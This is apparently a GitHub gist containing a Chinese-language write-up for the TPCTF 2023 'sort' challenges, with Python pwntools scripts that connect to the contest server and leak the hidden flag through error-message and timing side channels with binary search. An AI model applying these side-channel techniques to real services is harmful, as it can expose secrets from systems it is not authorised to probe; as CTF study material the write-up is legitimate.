Skip to content

Instantly share code, notes, and snippets.

@qwerty472123
Last active November 28, 2023 07:48
Show Gist options
  • Save qwerty472123/52899714c7f7d8cc4872902ba3d484a4 to your computer and use it in GitHub Desktop.
Save qwerty472123/52899714c7f7d8cc4872902ba3d484a4 to your computer and use it in GitHub Desktop.
TPCTF 2023 sort side-channel wp (AAA)

sort 1/2/teaser

侧信道3连 233

teaser

可以对check总是令B=A,然后对长度不足31的情况判断其长度令B=0还是A(0的时候所有flag乱序输出一直,否则不一致),这样可以根据报错leak长度信息。

发现长度不足31后,可以对长度不足的情况判断开头是否TPCTF,如果是,那么就是第一个没有乱序的flag,对于其他不足的情况总是返回0,对于这种情况判断其是否>mid来决定访问A还是0,这样可以二分出flag来。

from pwn import *
from tqdm import tqdm
from Crypto.Util.number import bytes_to_long, long_to_bytes

context.log_level = 'error'
# context.log_level = 'debug'

def play_once(res):
    rr = remote('202.112.238.82', 13371)
    # rr = process(['python3', 'sort-teaser.py'])
    rr.recvuntil(b'Enter your function A:\n')
    for i in res.splitlines():
        rr.sendline(i.encode())
    rr.sendline(b'EOF')
    rc = rr.recvline().decode().strip()
    if rc == 'Enter your function B:':
        rr.sendline(b'EOF')
        rc = rr.recvline().decode().strip()
    if rc == 'Traceback (most recent call last):':
        rr.recvuntil(b'AssertionError')
        rc = rr.recvline().strip().decode().strip(': ')
        if rc == '':
            print('pure error')
            rc = "don't cheat"
    rr.close()
    return rc

# check length
def length_leq(x):
    if x >= 31:
        return True
    return f"""
U={8*x}
X=1<<U
D=A>=X
B=D*A
""".strip()

# flag1 = 31
# flag2 = 24
# flag3 = 29
length = 31
for i in range(5, 31)[::-1]:
    ret = play_once(length_leq(i))
    print(i, ret)
    if ret == 'results are not same':
        break
    else:
        length = i

print('len', length)

def create_value(x, v):
    # return f'{x}={v}'
    cc = 128
    # cc = 25
    vs = []
    while v > 0:
        vs.append(v % (1<<cc))
        v >>= cc
    vs.reverse()
    if len(vs) == 0:
        vs = [0]
    lines = []
    for i, v in enumerate(vs):
        if i == 0:
            lines.append(f'{x}={v}')
            continue
        lines.append('Z=' + str(v))
        lines.append(f'{x}={x}<<{cc}')
        lines.append(f'{x}={x}+Z')
    return '\n'.join(lines) + '\n'

if length != 31:
    left = bytes_to_long(b'TPCTF{' + b' '*(length-7) + b'}')
    right = bytes_to_long(b'TPCTF{' + b'\x7f'*(length-7) + b'}')
    while left < right:
        mid = (left + right) // 2
        print(long_to_bytes(mid))
        payload = create_value('M', mid)
        payload += create_value('L', left)
        payload += create_value('R', right)
        # D==1 the value is first check, B=A
        # K==1 the value is first TPCTF{...}, B=A if M>=A
        # otherwise return 0
        payload += f"""
X=1<<{8*30}
D=A>=X
L=L<=A
R=A<=R
S=L+R
K=S==2
C=M>=A
C=C+K
C=C==2
D=D+C
D=D>=1
B=D*A
""".strip()
        ret = play_once(payload)
        # M>=A
        print(ret)
        if 'results are not same' == ret:
            right = mid
        else:
            left = mid + 1
    print(long_to_bytes(left))
    exit()

2

patch后的2版本对无猜测的侧信道造成了困难,但实际上可以先猜flag开头(TPCTF{之后的开头)一个字符,因为10次乱序后很难凑成第一个字符和正确的flag一样,即使运气不好也可以多跑次取众数,这样只要开头猜对接下来就能区分真假flag,对真flag用二分条件决定输出。

from pwn import *
from tqdm import tqdm
from Crypto.Util.number import bytes_to_long, long_to_bytes

context.log_level = 'error'

def play_once(res):
    rr = remote('202.112.238.82', 13372)
    # rr = process(['python3', 'sort2.py'])
    rr.sendlineafter(b'Level: ', b'2')
    rr.recvuntil(b'Enter your function A:\n')
    for i in res.splitlines():
        rr.sendline(i.encode())
    rr.sendline(b'EOF')
    rc = rr.recvline().decode().strip()
    if rc == 'Enter your function B:':
        rr.sendline(b'EOF')
        rc = rr.recvline().decode().strip()
    if rc == 'Traceback (most recent call last):':
        rr.recvuntil(b'AssertionError')
        rc = rr.recvline().strip().decode().strip(': ')
        if rc == '':
            print('pure error')
            rc = "don't cheat"
    rr.close()
    return rc

# check length
def length_leq(x):
    if x >= 31:
        return True
    return f"""
U={8*x}
X=1<<U
D=A>=X
B=D*A
""".strip()

# flag1 = 31
# flag2 = 24
length = 29

print('len', length)
cc = open('flag', 'wb')
def create_value(x, v):
    vs = []
    while v > 0:
        vs.append(v % (1<<25))
        v >>= 25
    vs.reverse()
    if len(vs) == 0:
        vs = [0]
    lines = []
    for i, v in enumerate(vs):
        if i == 0:
            lines.append(f'{x}={v}')
            continue
        lines.append('Z=' + str(v))
        lines.append(f'{x}={x}<<25')
        lines.append(f'{x}={x}+Z')
    return '\n'.join(lines) + '\n'
import string
if length != 31:
    faced = False
    for gc in string.printable:
        # if not faced and gc != 'c':
        #     continue
        # faced = True
        print('guess', gc)
        g = b'13hm3r_'
        left = bytes_to_long(b'TPCTF{' + g + b' '*(length-14) + b'}')
        right = bytes_to_long(b'TPCTF{' + g + b'\x7f'*(length-14) + b'}')
        cc = 0
        notgood = False
        la = None
        while left < right:
            mid = (left + right) // 2
            print(long_to_bytes(mid))
            payload = create_value('M', mid)
            payload += create_value('L', left)
            payload += create_value('R', right)
            # D==1 the value is first check, B=A
            # D==2 the value is second check, B=A
            payload += 'J=A\n'
            for i in range(31):
                payload += 'D=J%256\n'
                payload += 'J=J/256\n'
                payload += 'D=D==123\n'
                payload += 'Q=Q+D\n'
                # K==1 the value is first TPCTF{...}, B=A if M>=A
                # otherwise return 0
            payload += f"""
X=1<<{8*30}
D=A>=X
Q=Q==0
D=D+Q
D=D>0
L=L<=A
R=A<=R
S=L+R
K=S==2
C=M>=A
C=C+K
C=C==2
D=D+C
D=D>=1
B=D*A
    """.strip()
            ret = play_once(payload)
            # M>=A
            print(ret)
            ut = 'results are not same' == ret
            if la != ut:
                cc = 0
            else:
                cc += 1
                if cc > 10:
                    notgood = True
                    break
            la = ut
            if ut:
                right = mid
            else:
                left = mid + 1
        if notgood:
            print('not good')
            print(long_to_bytes(left))
        else:
            print(long_to_bytes(left))
            cc.write(long_to_bytes(left) + b'\n')
            cc.flush()
        # exit()

1

这题我先写一个花31*5句话做计数排序的计数(计数数组是一个大整数),然后再话几千行展开的版本,但是长度超过限制。

from Crypto.Util.number import bytes_to_long

# A -> C
for i in range(31):
    print('D=A%256')
    print('A=A//256')
    print('D=D*5')
    print('D=1<<D')
    print('C=C+D')

# C -> B
for i in list(range(32, 127)):
    cc = 5
    for j in range(cc)[::-1]:
        print(f'K=1<<{5*i+j}')
        print('K=C&K')
        print('K=K>0')
        print('M=K*' + str(8*(2**j)))
        print('U=K*' + str(bytes_to_long(bytes([i])*(2**j))))
        print('B=B<<M')
        print('B=B+U')

patch后的版本对于任何条件下看到flag后的输出均相同(除非预期解出题目),因此需要考虑时间侧信道。

考虑leak计数数组而非flag,这样就不用像第二问那样猜,而且有100次获取计数数组的机会,耗时可以大大增加。

然后就对计数数组做二分判断,如果满足条件就跑一段很花时间的大整数运算,不满足就一个溢出导致后面的大整数运算不会执行。

from pwn import *
from tqdm import tqdm
import time
from Crypto.Util.number import bytes_to_long, long_to_bytes

context.log_level = 'error'
# context.log_level = 'debug'
delta = 0
def play_once(res):
    rr = remote('202.112.238.82', 13372)
    # rr = process(['python3', 'sort2.py'])
    rr.sendlineafter(b'Level: ', b'1')
    rr.recvuntil(b'Enter your function A:\n')
    for i in res.splitlines():
        rr.sendline(i.encode())
    rr.sendline(b'EOF')
    prev = time.time()
    rc = rr.recvline().decode().strip()
    global delta
    delta = time.time() - prev
    if rc == 'Enter your function B:':
        rr.sendline(b'EOF')
        rc = rr.recvline().decode().strip()
    if rc == 'Traceback (most recent call last):':
        rr.recvuntil(b'AssertionError')
        rc = rr.recvline().strip().decode().strip(': ')
        if rc == '':
            print('pure error')
            rc = "don't cheat"
    rr.close()
    return rc

# check length
def length_leq(x):
    if x >= 31:
        return True
    payload = 'J=A\n'
    for i in range(31):
        payload += 'D=J%256\n'
        payload += 'J=J/256\n'
        payload += 'D=D==123\n'
        payload += 'Q=Q+D\n'
    return payload + f"""
Q=Q==0
U={8*x}
X=1<<U
D=A>=X
D=D+Q
D=D>=1
B=D*A
D=1-D
P=1<<99999
D=D*999999
D=D*P
""".strip() + '\n' +  '\n'.join(['D=1<<90030']*600)

# flag1 = 24
# flag2 = 24
# length = 31
# for i in range(5, 31)[::-1]:
    
#     ret = play_once(length_leq(i))
#     print(i, ret, delta)
#     if ret == 'results are not same':
#         break
#     else:
#         length = i

length = 28
print('len', length)
cc = open('flag', 'wb')
def create_value(x, v):
    vs = []
    while v > 0:
        vs.append(v % (1<<128))
        v >>= 128
    vs.reverse()
    if len(vs) == 0:
        vs = [0]
    lines = []
    for i, v in enumerate(vs):
        if i == 0:
            lines.append(f'{x}={v}')
            continue
        lines.append('Z=' + str(v))
        lines.append(f'{x}={x}<<128')
        lines.append(f'{x}={x}+Z')
    return '\n'.join(lines) + '\n'

def stupid_calc(A):
    C = 0
    for _ in range(31):
        D=A&255
        A=A>>8
        D=D*5
        D=1<<D
        C=C+D
    return C

left = stupid_calc(bytes_to_long(bytes(sorted(b'TPCTF{' + b' '*(length-7) + b'}'))))
right = stupid_calc(bytes_to_long(bytes(sorted(b'TPCTF{' + b'\x7f'*(length-7) + b'}'))))
cc = stupid_calc(bytes_to_long(bytes(sorted(b'TPCTF{A_strAnge_s1dechannel}'))))
print('cur', cc)
assert left <= cc <= right
cc = 0
notgood = False
la = None

def judge(mid):
    payload = 'B=A\n'
    for _ in range(31):
        payload += 'D=A&255\n'
        payload += 'A=A>>8\n'
        payload += 'D=D*5\n'
        payload += 'D=1<<D\n'
        payload += 'Q=Q+D\n'
    payload += create_value('M', mid)
    payload += f"""
L=1<<{8*27}
R=1<<{8*28}
L=L<=B
R=B<=R
S=L+R
K=S==2
C=M>=Q
C=C+K
D=C==2
P=1<<99999
D=D*999999
D=D*P
""".strip() + '\n' +  '\n'.join(['D=1<<90030']*600)
    play_once(payload)
    # print(delta)
    theta = 0.3
    retA = delta > theta
    play_once(payload)
    retB = delta > theta
    if retA != retB:
        play_once(payload)
        ret = delta > theta
    else:
        ret = retA
    return not ret

# judge(left)
# judge(right)
# exit()

tick = 0
while left < right:
    mid = (left + right) // 2
    print(tick, mid)
    tick += 1
    ut = judge(mid)
    if ut:
        right = mid
    else:
        left = mid + 1

print(left)
# exit()

弄出来后写个对于开头check返回A,对于乱序flag返回排序flag(用计数数组求出)

payload = 'B=A\n'
for _ in range(31):
    payload += 'D=A&255\n'
    payload += 'A=A>>8\n'
    payload += 'D=D*5\n'
    payload += 'D=1<<D\n'
    payload += 'Q=Q+D\n'
payload += f"""
L=1<<{8*27}
R=1<<{8*28}
L=L<=B
R=B<=R
S=L+R
K=S==2
X=4229435530265415963707867948001991994972200797905249491392287832957
U=1-K
B=B*U
R=K*X
B=B+R
""".strip()
print(payload)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment